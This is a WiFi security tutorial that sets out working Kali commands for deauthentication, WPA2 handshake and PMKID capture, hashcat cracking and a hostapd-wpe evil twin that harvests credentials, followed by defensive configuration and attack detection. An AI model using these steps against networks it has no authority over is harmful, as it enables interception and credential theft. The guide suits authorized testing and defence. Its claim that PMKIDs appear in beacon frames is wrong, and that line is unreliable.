WiFi Security and Wireless Attacks: WPA2 Cracking, Evil Twin, and Defense

by

Wireless networks are everywhere — office WiFi, home networks, IoT devices, guest networks. Each one represents an attack surface that is literally accessible without physical entry to your building. Understanding how WiFi attacks work helps you audit and defend your own networks. This guide covers real wireless security techniques with commands, from basic reconnaissance to WPA2 cracking and defense.

Understanding WiFi Security Standards

WEP (Wired Equivalent Privacy): Completely broken. Can be cracked in under 2 minutes regardless of password complexity. Still found in old industrial/IoT devices. Never use WEP.

WPA/WPA2-Personal: Uses a Pre-Shared Key (PSK). Vulnerable to offline dictionary attacks if the handshake is captured. WPA2 with a strong password is reasonably secure. Weak or dictionary-based passwords can be cracked.

WPA3: Uses Simultaneous Authentication of Equals (SAE) which prevents offline dictionary attacks. Each connection attempt requires interaction with the AP. Significantly more secure than WPA2. Transition mode allows WPA2/WPA3 mixed environments.

WPA2-Enterprise (802.1X): Uses RADIUS authentication — each user has unique credentials. No shared password to crack. Standard for corporate environments.

Setting Up for WiFi Testing (Kali Linux)

# Recommended adapter: Alfa AWUS036AXML (supports monitor mode + injection)
# Check adapter capabilities
iwconfig
iw list | grep "Supported interface modes" -A 10

# Check if monitor mode is supported
iw phy phy0 info | grep "monitor"

# Set interface to monitor mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

# Or using airmon-ng (kills interfering processes automatically)
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# This creates wlan0mon interface

Network Discovery and Reconnaissance

# Scan all nearby networks
sudo airodump-ng wlan0mon

# Output columns:
# BSSID - AP MAC address
# PWR - Signal strength (closer to 0 = stronger)
# Beacons - Number of broadcast frames
# CH - Channel
# ENC - Encryption (WPA2/WPA3/OPN)
# CIPHER - CCMP = strong, TKIP = weaker
# AUTH - PSK = personal, MGT = enterprise
# ESSID - Network name

# Focus on a specific network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# -c 6: Channel 6
# --bssid: Target AP MAC
# -w capture: Save to capture-01.cap

# Kiuuwi: wash tool to find WPS-enabled networks (WPS is vulnerable)
wash -i wlan0mon

Capturing the WPA2 4-Way Handshake

WPA2 authentication uses a 4-way handshake between client and AP. If captured, this handshake can be attacked offline. No need to stay near the target — capture it, then crack it anywhere.

# Method 1: Wait for a client to connect naturally
# Run airodump-ng and wait for "WPA handshake: AA:BB:CC:DD:EE:FF" message

# Method 2: Force reconnection with deauth attack (faster)
# Send deauth packets to disconnect a client - they will reconnect automatically
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon
# -a: AP MAC
# -c: Client MAC (or omit to deauth all clients)
# --deauth 5: Send 5 deauth packets

# Confirm handshake captured (look for "WPA handshake" in airodump-ng output)
# File saved as: capture-01.cap

# Verify the handshake is in the capture file
aircrack-ng capture-01.cap
# Should show: "1 handshake" next to the target SSID

Cracking WPA2 Passwords

# Method 1: Aircrack-ng dictionary attack (CPU-based)
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

# Method 2: Hashcat (GPU-accelerated, much faster)
# Convert capture to hashcat format
hcxpcapngtool -o hash.22000 capture-01.cap

# Crack with hashcat
hashcat -m 22000 hash.22000 rockyou.txt
hashcat -m 22000 hash.22000 rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Method 3: PMKID attack (no client needed!)
# Modern WPA2 APs broadcast PMKID in beacon frames
# Capture PMKID without needing a client connection
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool pmkid.pcapng -o hash.22000
hashcat -m 22000 hash.22000 rockyou.txt

# GPU cracking speed comparison:
# GTX 1080: ~400,000 passwords/second for WPA2
# RTX 4090: ~1,500,000 passwords/second
# Time to crack 8-char lowercase: ~37 hours on RTX 4090
# Time to crack 12-char random: ~hundreds of years

Evil Twin / Rogue Access Point

An evil twin attack creates a fake WiFi network that looks identical to the real one. Victims connect to it and the attacker intercepts all their traffic — including credentials and session cookies over unencrypted or poorly protected connections.

# Create rogue AP with hostapd-wpe (for authorized pentests only)
# hostapd-wpe captures WPA2-Enterprise credentials (usernames + NTLMv2 hashes)

# Install hostapd-wpe
sudo apt install hostapd-wpe

# Configuration: /etc/hostapd-wpe/hostapd-wpe.conf
ssid=CorporateWiFi   # Same as target SSID
channel=6
wpa=2
wpa_key_mgmt=WPA-EAP
ieee8021x=1

# Start the rogue AP
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# When corporate users connect:
# They get an EAP challenge and respond with their credentials
# hostapd-wpe captures: username + NTLMv2 hash
# Crack the hash: hashcat -m 5600 ntlmv2.txt rockyou.txt

Wireless Security Defense Checklist

For Home Networks

# Check your current WiFi security
nmcli -f SSID,SECURITY dev wifi

# Recommended home WiFi configuration:
# 1. WPA3 Personal (or WPA2/WPA3 transition mode)
# 2. Password: 20+ characters, random (use a password manager)
#    Example: "xK9#mP2$vL7@nQ4&wR6!"
#    A 20-char random password cannot be cracked in any reasonable timeframe

# 3. Change default router admin credentials
#    Username: admin (change this)
#    Password: admin/1234/password (NEVER keep these)

# 4. Disable WPS (WiFi Protected Setup)
#    WPS PIN can be brute-forced in hours

# 5. Enable router firewall and disable remote management

# 6. Separate IoT devices on a guest/VLAN network
#    Smart TVs, cameras, thermostats should NEVER share a network with your laptop

For Corporate Networks

# Cisco WLC: Configure WPA3 Enterprise
# (802.1X with RADIUS)
wlan corp-wifi 1 Corp-WiFi
security wpa akm 802.1x
security wpa wpa2 ciphers aes
security wpa wpa3
radius server auth 192.168.1.100 auth-port 1812 key RADIUS_SECRET

# RADIUS server (FreeRADIUS) configuration
# /etc/freeradius/3.0/users file:
"john.doe"      Cleartext-Password := "SecurePassword"
                Service-Type = Framed-User

# Or integrate with Active Directory for domain authentication
# /etc/freeradius/3.0/mods-enabled/ntlm_auth:
ntlm_auth = "/usr/bin/ntlm_auth --request-nt-key --username=%{%{Stripped-User-Name}:-%{User-Name}} --challenge=%{%{mschap:Challenge}:-00} --nt-response=%{%{mschap:NT-Response}:-00}"

# Wireless IDS: Detect rogue APs
# Cisco WLC automatically detects and contains rogue APs
# Alert thresholds: New AP on corporate channel, same SSID different BSSID

# Check for rogue APs with Kismet
kismet -c wlan0mon
# Look for: Unknown APs on your SSID, unusual clients

Detecting WiFi Attacks

# Detect deauth attacks with Kismet (sign of active attack or evil twin setup)
kismet-client
# Alert: "Possible deauthentication attack"

# Monitor for deauth frames with tshark
sudo tshark -i wlan0mon -Y "wlan.fc.type_subtype == 0x000c"
# Frame type 0x000c = Deauthentication

# Detect PMKID capture attempts (unusual association requests)
sudo tshark -i wlan0mon -Y "eapol" | grep "PMKID"

# Aircrack-ng fake authentication detection
# Unusual probe requests with your SSID but unknown MAC = possible recon

The most important wireless security lesson: password complexity is the defense against WPA2 cracking. A 20-character random password from a password manager is completely immune to dictionary attacks. The same 20-character password made of dictionary words (example: “correct-horse-battery-staple”) can potentially be cracked with smart rule-based attacks. Use true randomness, use length, and switch to WPA3 as soon as your hardware supports it.